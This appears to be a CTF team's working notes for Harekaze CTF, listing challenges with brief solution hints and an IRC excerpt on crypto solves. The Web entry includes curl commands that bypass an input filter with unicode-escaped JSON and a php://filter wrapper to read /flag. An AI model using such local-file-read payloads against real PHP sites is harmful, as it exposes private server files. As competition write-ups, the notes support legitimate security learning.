* DONE Welcome [Misc 10] Solved: wasamasa - Copy and paste that flag! * DONE scramble [Reversing 100] Solved: Oblivion - ELF binary messing around with program memory - It decompiles in Ghidra, but it's all gibberish - Oblivion solved it with some code * DONE ONCE UPON A TIME [Crypto 100] Solved: WTFH4X - Cryptosystem doing matrix multiplication with some randomization - Given the length of the output, there's four possible ways it has been created (since it's two parts and randomization allows each to happen two ways) - I have no idea how to solve linear algebra problems :( * DONE Baby ROP [Pwn 100] Solved: semchapeu * TODO The Steganography Generator [Reversing 200] - Decompiles cleanly - The Java code mutates certain pixels of the image - It uses a bytestream composed of some magic bytes followed by the flag * DONE Twenty-five [Crypto 100] Solved: wasamasa - Goal: Translate crypto.txt to valid perl code - I did forego frequency analysis and instead looked for unusual/unique words among the reserved keywords list - =qq= is a good start, from then one one can guess =qx= and continue until figuring out all letters - Searching reserved.txt for patterns like =^a..b$= is the way - Change the code to =print($text);= to see your progress and comment out =eval($text);= - Evaluating the fully translated code will print the flag * DONE Encode & Encode [Web 100] Solved: wasamasa - The key insight here is that the check is done before JSON decoding - So, you can enter something not matching the filter, but which decodes into something exfiltrating the flag - A second bypass is required, for this you can use the same trick to invoke a PHP wrapper that filters output - I picked =php://filter= to ROT13-encode the flag on its way out... #+BEGIN_SRC shell-script curl -i -H 'Content-Type: application/json' --data '{"page": "./index.html "}' http://problem.harekaze.com:10001/query.php curl -i -H 'Content-Type: application/json' --data '{"page": "/flag"}' http://problem.harekaze.com:10001/query.php curl -i -H 'Content-Type: application/json' --data '{"page": "/\u0066lag"}' http://problem.harekaze.com:10001/query.php curl -i -H 'Content-Type: application/json' --data '{"page": "php\u003a//filter/read=string.rot13/resource=/\u0066lag"}' http://problem.harekaze.com:10001/query.php #+END_SRC * DONE Baby ROP 2 [Pwn 200] Solved: semchapeu * TODO show me your private key [Crypto 200] - I don't understand ECC at all - I should learn some sagemath * TODO Admin's Product key [Reversing 200] - No clue * TODO Login System [Pwn 200] - semchapeu is taking this one on * TODO Easy Notes [Web 200] - Lots of carefully written PHP - No obvious way to change the session contents - I've tried to leak the environment variables instead, no luck either - Maybe it's =$type=? * DONE [a-z().] [Misc 200] Solved: WTFH4X - This one's terrible - 1337 is 7*191 - You can obtain numbers by using =length= on an array or string - You can obtain properties without uppercase letters - You can call functions with 0 or 1 arguments - I got some numbers out of this, but nothing close - Crazy idea: Obtain running time and hope it matches eventually - Crazy idea: Reverse DNS on a numerically represented IP address - Neither will work because the VM namespace is seriously limited - There's some top-level functions with short names like =console.log.name= - Candidates can be obtained by pressing the tab key twice inside a =node= REPL and testing against the VM - You can build an algebra by using =concat= on strings and =repeat= on lengths - This together with a short enough primitive for 8 and 7 gives you the following term: 7*((8+8+7)*8+7) * DONE Now We Can Play!! [Crypto 200] Solved: WTFH4X - Some funky crypto exchange * TODO One Quadrillion [Crypto 200] - Some unreadable hashing function * TODO Harekaze Note [Pwn 300] - semchapeu is taking this one on * DONE Avatar Uploader 1 [Misc 100] Solved: wasamasa - The flag can be obtained by triggering an error path in the uploader - It looks as if you just need a mangled PNG file - This code gives you the flag: #+BEGIN_SRC shell-script convert xc:red -size 1x1 1x1.png head -c20 1x1.png > broken.png #+END_SRC * TODO Avatar Uploader 2 [Web 300] - The flag is in the file system, so some exfiltration is required * TODO Ramen [Pwn 400] - I'll let semchapeu deal with this * TODO SQLite Voting [Web 350] - SQL injection, but not was we know it - The most severe restriction is no whitespace, followed by none of the usual characters - You only get a binary response back * Other 08:22 < WTFH4X> once upon a time: 08:22 < wasa> you can write it into a file 08:23 < WTFH4X> takenoko is just matrix multiplication % 251 -> so multiply encrypted flag by modular inverse of m2 08:23 < WTFH4X> from left side and from right side, take the one that gives printable flag 08:24 < WTFH4X> now we can play: 08:24 < WTFH4X> pass c1, c2 back to the server 08:25 < WTFH4X> you get back: pow(3, randint(2**16, 2**17), p) * flag % p 08:25 < WTFH4X> just brute all values of that random 08:26 < WTFH4X> for i in xrange(2**16, 2**17): x = c * inverse(pow(3, i, p), p) % p; if is_printable(x): print(x) 08:26 < WTFH4X> smth like that